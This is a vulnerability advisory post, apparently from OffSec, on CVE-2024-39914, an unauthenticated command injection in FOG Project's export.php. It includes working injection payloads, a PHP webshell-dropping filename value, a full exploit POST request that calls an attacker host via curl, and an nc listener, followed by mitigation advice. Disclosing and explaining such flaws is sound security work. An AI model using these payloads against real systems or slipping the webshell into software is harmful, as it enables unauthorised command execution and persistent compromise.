Jun 26, 2025
CVE-2024-39914 – Unauthenticated Command Injection in FOG Project’s export.php
Discover details about CVE-2024-39914, a critical unauthenticated command injection vulnerability in FOG Project ≤ 1.5.10.34. Learn how attackers can exploit export.php to execute system commands or deploy persistent webshells.
OffSec Team
CVE-2024-39914 is a critical unauthenticated command injection vulnerability in FOG Project version ≤ 1.5.10.34. The flaw exists in how the filename parameter is processed by export.php, allowing attackers to inject arbitrary system commands. This can be used for immediate command execution or to drop a persistent PHP webshell for follow-up exploitation.
- CVE ID: CVE-2024-39914
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 92.67%
- Affected Versions: ≤ 1.5.10.34
- Patched Version: 1.5.10.35
- Authentication Required: No
Impact: Remote Command Execution
Technical Breakdown
The export.php script within the fog/management/ directory includes logic that passes the filename parameter to a backend system command, likely using shell_exec() or similar unsanitized execution.
An attacker can inject system commands inside the filename parameter, for example:
filename=$(id)This leads to immediate execution of id on the server. Additionally, attackers can write arbitrary content (e.g., a webshell) into a file on the server:
filename=$(echo '<?php echo shell_exec($_GET["cmd"]); ?>' > WEBSHELL)The resulting file (WEBSHELL) can then be accessed remotely to execute further OS commands.
Conditions for Exploitation
- FOG server must be network accessible
- No login or session is required
- Web server user must have write access to the web directory
- PHP execution is enabled under /fog/management/
Exploitation Steps
To exploit this, inject a system command in the filename parameter to achieve unauthenticated RCE.
Step 1: Send Malicious POST Request
POST /fog/management/export.php?filename=$(curl+192.168.100.8)&type=pdf HTTP/1.1
Host: 192.168.15.5
Content-Length: 21
User-Agent: ToxicPotato
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
fogguiuser=fog&nojson=2Step 2: Monitor the Attacker Server
On the attacking machine (e.g., 192.167.100.1), listen for incoming requests:
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 80
Connection from 192.168.15.5:49802
GET / HTTP/1.1Mitigation
- Upgrade to FOG Project 1.5.10.35 or later, where input validation and shell execution logic has been corrected
- Restrict access to /fog/management/ from public networks
- Apply input validation and disallow shell execution from user-supplied parameters
- Use a WAF to detect command injection patterns ($(), ;, |, etc.)
- Disable PHP execution in upload/export directories if possible
References
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec
Research & Tutorials
What is Phishing? Introduction to Phishing Demo (for Beginners)
Learn how phishing attacks work and how to spot them. Watch OffSec’s animated video to protect yourself from scams, spoofed sites, and social engineering.
Jul 15, 2025
2 min read
Research & Tutorials
CVE-2025-27636 – Remote Code Execution in Apache Camel via Case-Sensitive Header Filtering Bypass
Discover the critical Apache Camel vulnerability (CVE-2025-27636) that allows remote code execution via case-sensitive HTTP header manipulation in the exec component. Learn how attackers exploit this flaw and how to mitigate it.
Jul 10, 2025
2 min read
Research & Tutorials
CVE-2025-29306 – Unauthenticated Remote Code Execution in FoxCMS v1.2.5 via Unserialize Injection
Discover details about CVE-2025-29306, a critical RCE vulnerability in FoxCMS 1.2.5. Learn how unsafe use of PHP’s unserialize() function enables remote attackers to execute arbitrary system commands.
Jul 3, 2025
2 min read